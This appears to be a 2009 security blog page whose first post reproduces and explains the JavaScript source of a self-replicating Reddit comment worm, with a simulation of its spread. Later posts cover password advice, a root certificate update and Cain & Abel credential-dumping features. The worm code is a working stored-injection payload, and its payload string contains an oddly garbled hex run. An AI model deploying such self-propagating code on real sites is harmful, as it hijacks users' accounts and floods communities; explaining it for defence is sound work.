Reddit Javascript Worm?

September 27, 2009 – 10:13 PM

Well, all that URL-encoded text in the links evaluates to something functionally equivalent to this:

    // Build the reply body. this.innerHTML is the URL-encoded text of the link
    // the payload is attached to, so the new comment carries a copy of its own
    // source as link text, plus a link target that will eval that text again.
    nonsense = "[x][b]\n[b]:/[" + this.innerHTML + "](/=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

    // Open a reply box under every comment on the page (jQuery's .click()
    // with no argument fires the element's click handler).
    elements = document.getElementsByTagName('a');
    for (i = 0; i < elements.length; i++) {
        if (elements[i].innerHTML == 'reply') {
            $(elements[i]).click();
        }
    }

    // Put the payload into every textarea, i.e. every reply box just opened.
    elements = document.getElementsByTagName('textarea');
    for (i = 0; i < elements.length; i++) {
        elements[i].value = nonsense;
    }

    // Submit every visible 'save' button: one infected reply under every comment.
    elements = document.getElementsByTagName('button');
    for (i = 0; i < elements.length; i++) {
        if (elements[i].innerHTML     == 'save'
        &&  elements[i].style.display != 'none') {
            $(elements[i]).click();
        }
    }

    ">x"    // trailing fragment of the injected link markup, left as pasted

I’m not an expert so I can’t decipher what it’s doing up there with the nonsense bit. It looks like something akin to a quine. Any takers?

Update: sorry about the misleading title; I was under the mistaken impression that this was specific to Firefox. It appears to affect WebKit and Gecko browsers at least, but it didn’t hit me with Safari 4.
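As an added example, not code from the original post or from reddit, here is a constructed in-memory model of a comment page with the worm's three loops run against it, to show what they do to a page as a whole. The page model (one 'reply' link per comment, a textarea and a visible 'save' button that appear once it is clicked), the helper names and the simplified reply body built by `buildNonsense()` are assumptions of this example.

```javascript
// Added example, not code from the original post or from reddit: a constructed
// in-memory model of a comment page, used to show what the three loops above do
// to a page as a whole. The page model (a 'reply' link per comment, a textarea
// and a visible 'save' button that appear once it is clicked) is an assumption
// of this example, as is the simplified reply body built by buildNonsense().

// Substring that marks a comment as carrying the payload.
const MARKER = 'eval(unescape(this.innerHTML';

// Same shape as the worm's `nonsense` string with the long hash left out:
// the text of the link that fired the payload (its URL-encoded source)
// becomes the text of a new link whose target evals that text again.
function buildNonsense(linkInnerHTML) {
  return '[x][b]\n[b]:/[' + linkInnerHTML + '](/=eval(unescape(this.innerHTML//)';
}

// A page is an array of comments; replyOpen and draft stand in for the
// textarea and save button that exist only after 'reply' has been clicked.
function makePage(bodies) {
  return bodies.map(body => ({ body, replyOpen: false, draft: '' }));
}

const isInfected = c => c.body.includes(MARKER);

// One victim's browser renders the page and an infected link fires.
// `link` plays the role of `this` inside the payload. Returns the number
// of replies posted by this single page view.
function runWorm(page, link) {
  const nonsense = buildNonsense(link.innerHTML);

  // loop 1: click every 'reply' link -> a reply box under every comment
  for (const c of page) c.replyOpen = true;

  // loop 2: set every textarea's value -> every open box holds the payload
  for (const c of page) if (c.replyOpen) c.draft = nonsense;

  // loop 3: click every visible 'save' -> one new comment per open box
  const posted = [];
  for (const c of page) {
    if (c.replyOpen && c.draft) {
      posted.push({ body: c.draft, replyOpen: false, draft: '' });
      c.draft = '';
      c.replyOpen = false;
    }
  }
  page.push(...posted);
  return posted.length;
}

// Number of infected comments after each of `viewers` successive victims
// loads the page. Stops early if no infected comment is present.
function spread(page, viewers) {
  const counts = [];
  for (let v = 0; v < viewers; v++) {
    const carrier = page.find(isInfected);
    if (!carrier) break;
    runWorm(page, { innerHTML: encodeURIComponent(carrier.body) });
    counts.push(page.filter(isInfected).length);
  }
  return counts;
}

// Constructed sample: three comments, one of which carries the payload.
const samplePage = makePage(['first comment', buildNonsense('%5Bx%5D'), 'second comment']);
console.log(spread(samplePage, 3)); // -> [4, 10, 22]: the page doubles with every viewer
```

The fan-out is what turns one stored script injection into a worm: every victim replies under every comment on the page, so the thread doubles with each view, and each new reply carries the link text that the next victim's browser will eval.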

Source:
http://www.reddit.com/r/programming/comments/9oo8j/source_code_for_the_redditfirefox_exploit/

Password Dos and Don’ts

September 27, 2009 – 12:19 PM

Here’s a great list of password dos and don’ts to make sure you are using good, strong passwords and protecting your accounts as well as you can.

DO use a password manager such as those reviewed by Scott Dunn in his Sept. 18, 2008, Insider Tips column.

DO change passwords frequently. I change mine every six months or whenever I sign in to a site I haven’t visited in a long time. Don’t reuse old passwords. Password managers can assign expiration dates to your passwords and remind you when the passwords are about to expire.

DO keep your passwords secret. Putting them into a file on your computer, e-mailing them to others, or writing them on a piece of paper in your desk is tantamount to giving them away. If you must allow someone else access to an account, create a temporary password just for them and then change it back immediately afterward. No matter how much you may trust your friends or colleagues, you can’t trust their computers. If they need ongoing access, consider creating a separate account with limited privileges for them to use.

DON’T use passwords composed of dictionary words, birthdays, family and pet names, addresses, or any other personal information. Don’t use repeated characters such as 111 or sequences like abc, qwerty, or 123 in any part of your password.

DON’T use the same password for different sites. Otherwise, someone who culls your Facebook or Twitter password in a phishing exploit could, for example, access your bank account.

DON’T allow your computer to sign in automatically on boot-up, which in turn triggers any automatic e-mail, chat, or browser sign-ins. Avoid using the same Windows sign-in password on two different computers.

DON’T use the “remember me” or automatic sign-in option available on many Web sites. Keep sign-ins under the control of your password manager instead.

DON’T enter passwords on a computer you don’t control — such as a friend’s computer — because you don’t know what spyware or keyloggers might be on that machine.

DON’T access password-protected accounts over open Wi-Fi networks — or any other network you don’t trust — unless the site is secured via https. Use a VPN if you travel a lot.

DON’T enter a password or even your account name in any Web page you access via an e-mail link. These are most likely phishing scams. Instead, enter the normal URL for that site directly into your browser, and proceed to the page in question from there.
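As an added example, not from the Windows Secrets article, here is a checker that applies the DON’Ts above (dictionary words, personal information, repeated characters, sequences and keyboard rows) to a candidate password. The word list, the keyboard rows, the minimum length and the shape of the `personal` object are assumptions of this example; a real deployment would check against a full dictionary and a breach corpus rather than this toy list.

```javascript
// Added example, not from the Windows Secrets article: a checker that applies
// the DON'Ts above to a candidate password. The word list, the keyboard rows,
// the minimum length and the shape of the `personal` object are assumptions
// of this example; a real deployment would check against a full dictionary
// and a breach corpus, not this toy list.

// Constructed stand-in for a dictionary.
const DICTIONARY = ['password', 'welcome', 'summer', 'dragon', 'monkey', 'letmein'];

// Alphabet, digits and keyboard rows; runs from these (forwards or backwards)
// are the "abc", "123" and "qwerty" sequences the article warns about.
const SEQUENCES = ['abcdefghijklmnopqrstuvwxyz', '0123456789',
                   'qwertyuiop', 'asdfghjkl', 'zxcvbnm'];

const MIN_LENGTH = 12;   // assumption; the article gives no number

// Three or more of the same character in a row, e.g. "111".
function hasRepeat(pw, n = 3) {
  return new RegExp('(.)\\1{' + (n - 1) + '}').test(pw);
}

// Any run of n consecutive characters that appears forwards or backwards
// inside one of the SEQUENCES strings, e.g. "abc", "321", "qwe".
function hasSequence(pw, n = 3) {
  const lower = pw.toLowerCase();
  for (let i = 0; i + n <= lower.length; i++) {
    const run = lower.slice(i, i + n);
    const rev = run.split('').reverse().join('');
    if (SEQUENCES.some(s => s.includes(run) || s.includes(rev))) return true;
  }
  return false;
}

// Names, pet names, addresses, birthdays: every word of 3+ characters from the
// supplied personal details, plus the digits of each value (1984-03-07 -> 19840307).
function containsPersonal(pw, personal) {
  const lower = pw.toLowerCase();
  const tokens = [];
  for (const value of Object.values(personal)) {
    const s = String(value).toLowerCase();
    tokens.push(...s.split(/[^a-z0-9]+/).filter(t => t.length >= 3));
    const digits = s.replace(/\D/g, '');
    if (digits.length >= 4) tokens.push(digits);
  }
  return tokens.some(t => lower.includes(t));
}

// Returns the list of rules the password breaks; an empty list means it passed.
function checkPassword(pw, personal = {}) {
  const problems = [];
  const lower = pw.toLowerCase();
  if (pw.length < MIN_LENGTH) problems.push('too short');
  if (DICTIONARY.some(w => lower.includes(w))) problems.push('contains a dictionary word');
  if (hasRepeat(pw)) problems.push('repeated characters');
  if (hasSequence(pw)) problems.push('sequential or keyboard-row characters');
  if (containsPersonal(pw, personal)) problems.push('contains personal information');
  return problems;
}

// Constructed sample input.
const me = { name: 'Alice Smith', pet: 'Rex', birthday: '1984-03-07' };
console.log(checkPassword('Summer2009!', me));     // -> [ 'too short', 'contains a dictionary word' ]
console.log(checkPassword('Rex1984!Walks', me));   // -> [ 'contains personal information' ]
console.log(checkPassword('vK7#pLm2$wQz9', me));   // -> []
```

Note that the checks are substring-based on purpose: “Summer2009!” fails even though it mixes case, digits and punctuation, because a dictionary attack tries exactly that kind of decoration. A checker like this only tells you a password is bad; the DO above (a password manager generating random passwords) is what makes one good.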

Source:
http://windowssecrets.com/2009/08/06/01-Gmail-flaw-shows-value-of-strong-passwords/

Internet Explorer supports free certificates

September 27, 2009 – 10:24 AM

With its latest update, Microsoft has added StartCom to the pre-installed root certificates in its operating system. As a result, Microsoft products (such as Internet Explorer) now accept certificates issued by StartCom without prompting the user or requiring any special configuration for the certificates. Third-party programs that use the operating system’s certificate store will also accept the certificates without asking further questions.

StartCom offers free certificates for the signing of e-mails (S/MIME) and for SSL server access, such as HTTPS. Unfortunately, with these “Class 1 certificates”, the applicant’s control of an e-mail address is generally the only thing verified.

While StartCom has been in the certificate store of Mozilla programs like Firefox and Thunderbird for some time, other issuers who offer free server certificates (such as CACert) are not currently included in the Root CA lists of commonly used programs. Users therefore have to inspect and confirm each server certificate or add the root certificate of such issuers to their certificate store.

The root certificate update is available as an option via Windows Update.

Source:
http://www.h-online.com/security/Internet-Explorer-supports-free-certificates–/news/114332

Cain & Abel 4.9.32 released

September 25, 2009 – 6:11 PM

Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weaknesses present in protocol standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, but it also ships some “non-standard” utilities for Microsoft Windows users.

New:

  • Added Abel64.exe and Abel64.dll to support hashes extraction on x64 operating systems.
  • Added x64 operating systems support in NTLM hashes Dumper, MS-CACHE hashes Dumper, LSA Secrets Dumper, Wireless Password Decoder, Credential Manager Password Decoder, DialUp Password Decoder.
  • Added Windows Live Mail (Windows 7) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
  • Fixed a bug of RSA SecurID Calculator within XML import function.
  • Executables rebuilt with Visual Studio 2008.

Download:
http://www.oxid.it/cain.html

F-Secure Health Check 2.0 Beta

September 24, 2009 – 4:33 PM

F-Secure Health Check checks your computer for potentially unsafe software and, by suggesting solutions, helps you resolve the situation before it turns into a problem. What security measures you take is entirely up to you.

F-Secure Health Check does not check your computer for viruses, Trojan horses, backdoors, bots, rootkits or other malware, nor does it protect you against hackers and phishing attempts. Use your security software, such as F-Secure Internet Security or F-Secure Online Virus Scanner, to scan your computer for malware.


2.0 Beta:
http://www.f-secure.com/en_EMEA/support/home-office/beta-programs/healthcheck/index.html